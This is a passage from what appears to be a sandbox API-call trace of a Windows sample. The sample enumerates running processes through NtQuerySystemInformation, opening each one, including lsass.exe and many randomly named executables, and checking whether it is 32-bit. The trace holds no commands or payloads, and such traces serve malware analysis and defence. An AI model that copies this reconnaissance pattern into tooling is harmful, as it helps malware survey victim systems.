	[0097.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.893] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.893] CloseHandle (hObject=0x248) returned 1
	[0097.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16778) returned 0xc0000004
	[0097.963] VirtualAlloc (lpAddress=0x0, dwSize=0x16878, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16878, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad88, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.969] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.969] CloseHandle (hObject=0x248) returned 1
	[0097.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658da8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.970] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.970] CloseHandle (hObject=0x248) returned 1
	[0097.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.971] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.971] CloseHandle (hObject=0x248) returned 1
	[0097.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.971] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.971] CloseHandle (hObject=0x248) returned 1
	[0097.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.971] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.971] CloseHandle (hObject=0x248) returned 1
	[0097.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.972] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.972] CloseHandle (hObject=0x248) returned 1
	[0097.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658d48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.972] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.972] CloseHandle (hObject=0x248) returned 1
	[0097.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.972] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.972] CloseHandle (hObject=0x248) returned 1
	[0097.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.973] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.973] CloseHandle (hObject=0x248) returned 1
	[0097.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.973] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.973] CloseHandle (hObject=0x248) returned 1
	[0097.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.974] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.974] CloseHandle (hObject=0x248) returned 1
	[0097.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658e08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.974] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.974] CloseHandle (hObject=0x248) returned 1
	[0097.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.974] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.974] CloseHandle (hObject=0x248) returned 1
	[0097.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65acc8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.974] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.974] CloseHandle (hObject=0x248) returned 1
	[0097.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.975] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.975] CloseHandle (hObject=0x248) returned 1
	[0097.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658970, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.975] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.975] CloseHandle (hObject=0x248) returned 1
	[0097.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658f28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.975] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.975] CloseHandle (hObject=0x248) returned 1
	[0097.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.976] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.976] CloseHandle (hObject=0x248) returned 1
	[0097.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.976] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.976] CloseHandle (hObject=0x248) returned 1
	[0097.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658e68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.976] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.976] CloseHandle (hObject=0x248) returned 1
	[0097.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.977] CloseHandle (hObject=0x248) returned 1
	[0097.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.977] CloseHandle (hObject=0x248) returned 1
	[0097.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.977] CloseHandle (hObject=0x248) returned 1
	[0097.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658cb8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.978] CloseHandle (hObject=0x248) returned 1
	[0097.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.978] CloseHandle (hObject=0x248) returned 1
	[0097.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.978] CloseHandle (hObject=0x248) returned 1
	[0097.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x6590c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.978] CloseHandle (hObject=0x248) returned 1
	[0097.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.979] CloseHandle (hObject=0x248) returned 1
	[0097.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x6590e8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.979] CloseHandle (hObject=0x248) returned 1
	[0097.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.979] CloseHandle (hObject=0x248) returned 1
	[0097.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658a60, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
